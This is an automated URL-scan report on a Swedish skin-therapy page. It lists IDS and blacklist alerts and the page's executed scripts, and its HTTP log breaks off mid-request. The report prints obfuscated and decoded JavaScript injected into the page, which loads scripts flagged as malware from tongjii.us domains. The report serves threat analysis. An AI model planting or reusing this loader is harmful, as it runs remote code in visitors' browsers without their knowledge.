Overview

URL: hudterapeuter.com/malmo/vaxning
IP: 195.74.38.68
ASN: AS41528 Binero AB
Location: Sweden
Report completed: 2017-06-30 17:13:37 CEST
urlquery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2017-06-30T17:12:47.930725+0200 1 Client IP  180.149.138.197 ET POLICY External IP Lookup sina.com.cn


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-06-30 2 lib.tongjii.us/tongji.js Malware
2017-06-30 2 cn.tongjii.us/show1.js?r2=30 Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 195.74.38.68

Date | UQ / IDS / BL | URL | IP
2019-04-30 09:05:10 +0200 | 0 - 0 - 0 | espanet2019.se | 195.74.38.68
2019-02-19 05:39:33 +0100 | 0 - 0 - 2 | https://www.northmaint.se/ | 195.74.38.68
2018-12-27 15:10:08 +0100 | 0 - 0 - 1 | whoisip.se/robots.txt | 195.74.38.68
2018-11-25 21:10:19 +0100 | 0 - 0 - 1 | medfors.com/dd | 195.74.38.68
2018-11-06 14:05:16 +0100 | 2 - 0 - 2 | whoisip.se | 195.74.38.68
2018-11-06 13:56:12 +0100 | 2 - 0 - 2 | whoisip.se | 195.74.38.68
2018-11-06 13:55:20 +0100 | 2 - 0 - 2 | whoisip.se | 195.74.38.68
2018-01-19 15:07:50 +0100 | 2 - 0 - 2 | www.whoisip.se/ | 195.74.38.68
2018-01-04 13:28:36 +0100 | 2 - 0 - 1 | www.whoisip.se/ | 195.74.38.68
2017-12-19 12:16:09 +0100 | 2 - 0 - 1 | www.klockan.info/ | 195.74.38.68

Last 10 reports on ASN: AS41528 Binero AB

Date | UQ / IDS / BL | URL | IP
2019-06-27 09:11:33 +0200 | 0 - 0 - 0 | www.tigercolor.com | 195.74.38.98
2019-06-10 18:16:55 +0200 | 0 - 0 - 2 | arnfast-kio-konsult.se/components/dhl.html | 195.74.38.186
2019-06-10 15:33:46 +0200 | 0 - 0 - 1 | kustkrogenolofsbo.se/wordpress/wp-content/plu (...) | 195.74.38.121
2019-06-10 10:31:44 +0200 | 0 - 0 - 1 | fifajournal.com/D1o40Dmemk | 195.74.38.98
2019-06-10 07:08:17 +0200 | 0 - 0 - 1 | solberga.org/tmp/install_4ee8d8cc51b82/media/ (...) | 195.74.38.62
2019-06-10 07:06:02 +0200 | 0 - 0 - 1 | solberga.org/tmp/install_4ee8d8cc51b82/media/ (...) | 195.74.38.62
2019-06-09 13:34:54 +0200 | 0 - 0 - 30 | ois.jenszackrisson.se/ | 195.74.38.176
2019-06-09 11:22:58 +0200 | 0 - 0 - 2 | ostbergsmobelhus.com/wp-content/language | 195.74.38.160
2019-06-09 11:16:26 +0200 | 0 - 0 - 1 | https://www.ostbergsmobelhus.com/wp-content/l (...) | 195.74.38.160
2019-06-09 09:09:41 +0200 | 0 - 0 - 2 | svenskrisimport.com/index.php/riskakor | 195.74.38.171

No other reports on domain: hudterapeuter.com



JavaScript

Executed Scripts (24)


Executed Evals (5)

#1 JavaScript::Eval (size: 588, repeated: 3) - SHA256: e131aa02b31d0b9e695259eeb2ab07bacead75544f5b5abd8886a84155a09441

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return c.toString(36)
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[c.toString(a)] = k[c] || c.toString(a)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('1 4=4||[];(b(){1 2=5.e(\'7\');2.a=\'8://9.d.f/k.6?//i.6?g\';1 3=5.j(\'7\')[0];3.h.c(2,3)})();', 21, 21, '|var|hm_en|s|_hmt_en|document|js|script|http|lib|src|function|insertBefore|tongjii|createElement|us|41d12a21b4e1a726d4a651685b118811662033874|parentNode|google|getElementsByTagName|tj'.split('|'), 0, {}))
                                    

#2 JavaScript::Eval (size: 996, repeated: 3) - SHA256: 00f7a0523e0b4239298a8f783fe9cf82af9fd8ecef28a73b423edae9140739f6

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\'\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\'\\\\w+\'};c=1};r(c--){q(k[c]){p=p.t(C D(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}m p}(\'1 4=4||[];(b(){1 2=5.e(\\\'7\\\');2.a=\\\'8://9.d.f/k.6?//i.6?g\\\';1 3=5.j(\\\'7\\\')[0];3.h.c(2,3)})();\',o,o,\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\'.J(\'|\'),0,{}))', 55, 55, '|||||||||||||||||||||function|return|toString|21||if|while||replace|hm_en|eval||document|var|36|js|String|new|RegExp|_hmt_en|parentNode|script|google|getElementsByTagName|split|tj|us|41d12a21b4e1a726d4a651685b118811662033874|lib|createElement|src|http|insertBefore|tongjii'.split('|'), 0, {}))
                                    

#3 JavaScript::Eval (size: 1377, repeated: 3) - SHA256: 2616199a56bdbaae4dc5e778d3a306cd6b7b415c02024e067265dc20257b1ac3

eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('7(x(e)=="A"||e==k||e==K){e=L;9 b=3.N(\'v\');7(b!=k&&b.c!=k){b.c=\'\';3.d.M(b)}9 z=Q.R.T();9 y=/W 6/.Y(z);7(!y){Z={$11:\'v\'};$J={};9 2=3.g(\'h\');2.c=\'i://O.P.12/2/w/1.8/w.U.2\';2.m(\'n\',\'f-8\');7(x B==\'A\'){(3.q("u")[0]||3.d).s(2);2.t=2.r=p(){7(2&&2.5&&2.5!="j"&&2.5!="o"){l}B.S();9 a=3.g(\'h\');a.c=\'i://I.C.D/E.2?X=\'+F G().H();a.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(a);a.t=a.r=p(){7(a&&a.5&&a.5!="j"&&a.5!="o"){l}}}}10{9 4=3.g(\'h\');4.c=\'i://I.C.D/E.2?V=\'+F G().H();4.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(4);4.t=4.r=p(){7(4&&4.5&&4.5!="j"&&4.5!="o"){l}}}}}', 62, 65, '||js|document|js_b|readyState||if||var||seed|src|body|sbj_new_loading|utf|createElement|script|http|loaded|null|return|setAttribute|charset|complete|function|getElementsByTagName|onreadystatechange|appendChild|onload|head|tongjiTool|jquery|typeof|isIE6|_ua|undefined|jQuery|tongjii|us|show1|new|Date|getDate|cn|_GLOBAL|false|true|removeChild|getElementById|lib|sinaapp|navigator|userAgent|noConflict|toLowerCase|min|r2|msie|r1|test|scope|else|pageid|com'.split('|'), 0, {}))
                                    

#4 JavaScript::Eval (size: 1434, repeated: 3) - SHA256: 5c3ec5fa684c7b643270645fc63e13323804eec6f86378f40d1de02a892ac6bd

if (typeof(sbj_new_loading) == "undefined" || sbj_new_loading == null || sbj_new_loading == false) {
    sbj_new_loading = true;
    var seed = document.getElementById('tongjiTool');
    if (seed != null && seed.src != null) {
        seed.src = '';
        document.body.removeChild(seed)
    }
    var _ua = navigator.userAgent.toLowerCase();
    var isIE6 = /msie 6/.test(_ua);
    if (!isIE6) {
        scope = {
            $pageid: 'tongjiTool'
        };
        $_GLOBAL = {};
        var js = document.createElement('script');
        js.src = 'http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js';
        js.setAttribute('charset', 'utf-8');
        if (typeof jQuery == 'undefined') {
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js);
            js.onload = js.onreadystatechange = function() {
                if (js && js.readyState && js.readyState != "loaded" && js.readyState != "complete") {
                    return
                }
                jQuery.noConflict();
                var a = document.createElement('script');
                a.src = 'http://cn.tongjii.us/show1.js?r1=' + new Date().getDate();
                a.setAttribute('charset', 'utf-8');
                (document.getElementsByTagName("head")[0] || document.body).appendChild(a);
                a.onload = a.onreadystatechange = function() {
                    if (a && a.readyState && a.readyState != "loaded" && a.readyState != "complete") {
                        return
                    }
                }
            }
        } else {
            var js_b = document.createElement('script');
            js_b.src = 'http://cn.tongjii.us/show1.js?r2=' + new Date().getDate();
            js_b.setAttribute('charset', 'utf-8');
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js_b);
            js_b.onload = js_b.onreadystatechange = function() {
                if (js_b && js_b.readyState && js_b.readyState != "loaded" && js_b.readyState != "complete") {
                    return
                }
            }
        }
    }
}
                                    

#5 JavaScript::Eval (size: 261, repeated: 3) - SHA256: c3c91594491914f1aa57cb7a7342d87694cd45319576b7de0074b22ab82ab51e

var _hmt_en = _hmt_en || [];
(function() {
    var hm_en = document.createElement('script');
    hm_en.src = 'http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(hm_en, s)
})();
                                    

Executed Writes (4)

#1 JavaScript::Write (size: 222, repeated: 2) - SHA256: 50d23449657707d3106fd7fc1055ef0df5ec72801ee5ad399f484a1f2ef5df55

< a href = "http://clk.tradedoubler.com/click?p=70363&a=1978982&g=17342348&pools=450314"
target = "_blank" > < img border = "0"
src = "http://www.gymgrossisten.com/bilder/gymgrossisten/TD/bs_140x350.gif"
title = "Bodystore&#46;com" > < /a>
                                    

#2 JavaScript::Write (size: 84, repeated: 1) - SHA256: 071bb71cc5f59a8a7b8eeb83d3b40bdfebdb2381c15bfb06526d6bc7b795dd25

< script src = 'http://www.google-analytics.com/ga.js'
type = 'text/javascript' > < /script>
                                    

#3 JavaScript::Write (size: 141, repeated: 1) - SHA256: 6792fb438e241a3d38be92e2125693ea634b96aac6c310fcd14b6dc74ab26dc2

< script type = "text/javascript"
src = "http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)115778382"
charset = "ISO-8859-1" > < /script>
                                    

#4 JavaScript::Write (size: 141, repeated: 1) - SHA256: 5a22a9180b407e21e4b4b112579beaa36b0fe113d6573911e82fc3a585f99cca

< script type = "text/javascript"
src = "http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)307049898"
charset = "ISO-8859-1" > < /script>
                                    


HTTP Transactions (32)


Request Response
                                        
                                            GET /malmo/vaxning HTTP/1.1 
Host: hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=unjgabmep56956jermppv9kah7; path=/
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text, with very long lines
Size:   37995
Md5:    59f221aa6ac6d88ca9388304e70e6561
Sha1:   ce49031676bb6e78aca66bbf6d126a4d57c3193e
Sha256: d76397005b2fb111b9ebbec89b12bfa7400849ca84130a1b92f7d3f632a49889
                                        
                                            GET /styles.css HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:35 GMT
Etag: "4787354-296b-4fe4f032747eb"
Accept-Ranges: bytes
Content-Length: 10603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode C program text
Size:   10603
Md5:    5ded803ca90a08123c1ced2866e86ee2
Sha1:   74dcb7b85a5188b84ca70884ebb4b7eddfbdcce5
Sha256: 8a48bad8902f11fc9968003334f639b75dceba9ddd5447cc5dd619e8d279fc96
                                        
                                            GET /jquery.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "42f1bba-ddcc-5161df9070d0d"
Accept-Ranges: bytes
Content-Length: 56780
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   56780
Md5:    1744208268fa90854b7caf3ff2f97283
Sha1:   bdf1fb9d5e59fce38344d8583eb4854ed4944710
Sha256: 56fa09c4c7f114de833fc930b5e58872f24f0812cb68bed093ade296ea78a19e
                                        
                                            GET /jquery/javascript.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad287-18e-4fe4f0b4e5c47"
Accept-Ranges: bytes
Content-Length: 398
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   398
Md5:    3890351dc9f882025e2c8b2fcb55fec0
Sha1:   042f761101a7c99ccef3b8157738e1814db3036e
Sha256: 2be006305b1138ecda96b612633cc2c372edf3dd6d25185e31d488f041ca7b39
                                        
                                            GET /jquery/bgpos.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad286-4c2-4fe4f0b4d2b6c"
Accept-Ranges: bytes
Content-Length: 1218
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   1218
Md5:    c8df8821a7e0302ae8c9422365eb4237
Sha1:   a6c0364e106bc703aa42dce62cb2b5a7e323058f
Sha256: b7daed3cbf5bdeb9843317c797cbad5abfed769e8c1052a9eff6f5e3fbef0e21
                                        
                                            GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:42 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:42 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /jquery.fancybox/jquery.easing.1.3.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e53-2583-5161df9062e81"
Accept-Ranges: bytes
Content-Length: 9603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   9603
Md5:    fb323c2a880c896cfb5ebb97201f56ef
Sha1:   087990c77361bf282a986ce36f4b7e5cedf60223
Sha256: 2a8d2ecc528fd17f0650116705a34f66748859ab7c4ed407b759371f3dcd7bb5
                                        
                                            GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:42 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:42 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /jquery.fancybox/jquery.fancybox.css HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:37 GMT
Etag: "44b8e56-12e0-4fe4f03415410"
Accept-Ranges: bytes
Content-Length: 4832
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   4832
Md5:    b140fcaab5aec61d0b382e1d05c663fd
Sha1:   43d0633e7e0c8f65b24d12af188990d1303a8047
Sha256: da2eb39547d9b060599f8f20430c9e27fa1150dea042c0008fd96ac3854cc8be
                                        
                                            GET /jquery.fancybox/jquery.fancybox-1.2.1.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e54-3fc0-5161df90645e3"
Accept-Ranges: bytes
Content-Length: 16320
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   16320
Md5:    b77b3d074cbe4048495a2ad91b939fea
Sha1:   eca6c7751f7d375a31ce4a5ef9f69a19e1eb197b
Sha256: 564ee795773003273c505f0eed7183ab4ddad4c54cd930770cf8b19c8bfab126
                                        
                                            GET /img/logo_s.png HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:49 GMT
Etag: "457431b-32b0-4fe4f0b1fe58b"
Accept-Ranges: bytes
Content-Length: 12976
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  PNG image, 348 x 51, 8-bit/color RGBA, non-interlaced
Size:   12976
Md5:    e3f2b0d54c05a86e5162bc20acd1c509
Sha1:   b0c8108c2722d71a903b0a5a7fe6c9cfbee26300
Sha256: 2967aa5eddebb376c9b1fc35c81efbd3647ef6e227fcbe4aed1a8b77d63dea56
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         103.230.122.162
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:10:43 GMT
Content-Length: 584
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Connection: keep-alive
Etag: "5952fe3c-248"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with CRLF line terminators
Size:   584
Md5:    e3234a0a314ab9037281a61532d9f385
Sha1:   da19d2b503932bfb7b0ccf6c40b9f0b0d19282fb
Sha256: 59ec2b49759dd09f18e6a99dd9424f56223bef43b624f37979e02bd21c976722
                                        
                                            GET /tongji.js HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         103.230.122.162
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:10:43 GMT
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5952fe3c-803"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1145
Md5:    c4ad0d579602dfcb81e42018f2f7ca90
Sha1:   c778b8ce60d843fcaa8b943681af9cb28f87c53e
Sha256: 481eff6a5f51981e6f947ae316365d1d542478843d353f7afcbbbfff675e3a24

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /show1.js?r2=30 HTTP/1.1 
Host: cn.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:44 GMT
Last-Modified: Wed, 28 Jun 2017 00:56:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5952fec8-3bec"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4337
Md5:    734c5aaf87060a409bd55bc8829dff8e
Sha1:   bc6ebf6f4536aa2365ee8ce9050cd0833857aade
Sha256: 22848f8733ff0988fe0e7426bd91cf52a38325253b81d264a7d81fb362c966f1

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
If-Modified-Since: Wed, 28 Jun 2017 00:54:20 GMT
If-None-Match: "5952fe3c-248"

                                         
                                         103.230.122.162
HTTP/1.1 304 Not Modified
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:10:45 GMT
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Connection: keep-alive
Etag: "5952fe3c-248"


--- Additional Info ---
                                        
                                            GET /click/cookie.php?names=tb_qq&jsoncallback=jsonp1498835562968&_=1498835564937 HTTP/1.1 
